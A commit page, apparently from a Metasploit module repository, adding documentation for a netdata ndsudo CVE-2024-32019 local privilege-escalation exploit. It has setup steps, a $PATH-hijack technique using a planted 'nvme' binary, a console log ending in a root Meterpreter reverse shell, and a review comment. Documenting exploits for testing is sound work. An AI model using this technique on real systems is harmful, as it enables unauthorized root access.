Adds documentation, adds check method

Martin Sutovsky
2025-08-11 12:25:33 +02:00
parent 936e68eb2e
commit d219efc0ac
2 changed files with 81 additions and 61 deletions
@@ -0,0 +1,62 @@
## Vulnerable Application
Instructions to get the vulnerable application. If applicable, include links to the vulnerable install
files, as well as instructions on installing/configuring the environment if it is different than a
standard install. Much of this will come from the PR, and can be copy/pasted.
Installation steps:
1. `sudo apt install cmake libelf-dev git bison flex build-essential libssl-dev libsystem-dev liblz4-dev libzstd-dev libbrotli-dev uuid-dev libuv1-dev`
1. `wget https://github.com/netdata/netdata-nightlies/releases/download/v1.45.0-8-nightly/netdata-latest.tar.gz`
1. `gunzip netdata-latest.tar.gz`
1. `tar -xf netdata-latest.tar`
1. `cd netdata-v1.45.0-8-g5803c7766/`
1. `sudo `
## Verification Steps
Example steps in this format (is also in the PR):
1. Install the application
1. Start msfconsole
1. Do: `use [module path]`
1. Do: `run`
1. You should get a shell.
## Options
### WritableDir
A path where malicious `nvme` binary will be stored. This path will be later prepended to `$PATH` variable to achieve privilege escalation.
### NdsudoPath
A path to `ndsudo` binary.
## Scenarios
```
msf exploit(linux/local/ndsudo_cve_2024_32019) > run verbose=true
[*] Started reverse TCP handler on 192.168.3.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Vulnerable binary detected
[*] Creating malicious file at /tmp/nvme
[*] Writing '/tmp/nvme' (250 bytes) ...
[*] Executing..
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 10.5.134.200
[+] Deleted /tmp/nvme
[*] Meterpreter session 3 opened (192.168.3.7:4444 -> 10.5.134.200:53172) at 2025-08-11 11:05:24 +0200
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : 10.5.134.200
OS : Ubuntu 20.04 (Linux 5.13.0-1021-oem)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
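Review bot: The Vulnerable Application and Verification Steps sections still carry the documentation template's placeholder text, and the installation list stops at an unfinished last step that reads only `sudo `. Please replace the "Instructions to get the vulnerable application..." paragraph with a short description of the affected component (the `ndsudo` binary shipped with the netdata build being installed) and complete the final command, so a reader can actually reproduce the vulnerable setup. In Verification Steps, drop "Example steps in this format (is also in the PR)" and replace `use [module path]` with the real path, which the Scenarios prompt shows as `linux/local/ndsudo_cve_2024_32019`; the expected result can also be stated more precisely as a session running as root, matching the `getuid` output. Smaller points: `libsystem-dev` in the apt line looks like a typo and is worth checking against the actual package name, the `gunzip` and `tar -xf` steps could be one command, and the Options entries read better with articles ("the malicious `nvme` binary", "the `$PATH` variable", "the `ndsudo` binary"). Since the commit message says a check method is added, a sentence on what the check looks at would help explain the "Vulnerable binary detected" line in the sample output.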